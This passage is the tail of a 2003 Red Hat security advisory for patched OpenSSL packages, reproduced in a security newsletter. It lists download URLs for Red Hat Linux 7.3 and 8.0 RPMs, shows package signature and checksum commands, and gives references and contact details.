ftp://updates.redhat.com/7.3/en/os/i386/openssl-0.9.6b-30.7.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/openssl-devel-0.9.6b-30.7.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/openssl-perl-0.9.6b-30.7.i386.rpm
i686:
ftp://updates.redhat.com/7.3/en/os/i686/openssl-0.9.6b-30.7.i686.rpm
Red Hat Linux 8.0:
SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/openssl095a-0.9.5a-19.src.rpm
ftp://updates.redhat.com/8.0/en/os/SRPMS/openssl096-0.9.6-14.src.rpm
ftp://updates.redhat.com/8.0/en/os/SRPMS/openssl-0.9.6b-31.src.rpm
i386:
ftp://updates.redhat.com/8.0/en/os/i386/openssl095a-0.9.5a-19.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/openssl096-0.9.6-14.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/openssl-0.9.6b-31.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/openssl-devel-0.9.6b-31.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/openssl-perl-0.9.6b-31.i386.rpm
i686:
ftp://updates.redhat.com/8.0/en/os/i686/openssl-0.9.6b-31.i686.rpm
6. Verification:
These packages are GPG signed by Red Hat, Inc. for security. Our key
is available at http://www.redhat.com/about/contact/pgpkey.html
You can verify each package with the following command:
rpm --checksig -v <filename>
If you only wish to verify that each package has not been corrupted or
tampered with, examine only the md5sum with the following command:
md5sum <filename>
7. References:
http://lasecwww.epfl.ch/pub/lasec/doc/Vau02a.ps
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0078
8. Contact:
The Red Hat security contact is <secu-@redhat.com>. More contact
details at http://www.redhat.com/solutions/security/news/contact.html
Copyright 2003 Red Hat, Inc.
===============================================================================
End of Doc #5
===============================================================================
===============================================================================
End of GNSecNews #6
===============================================================================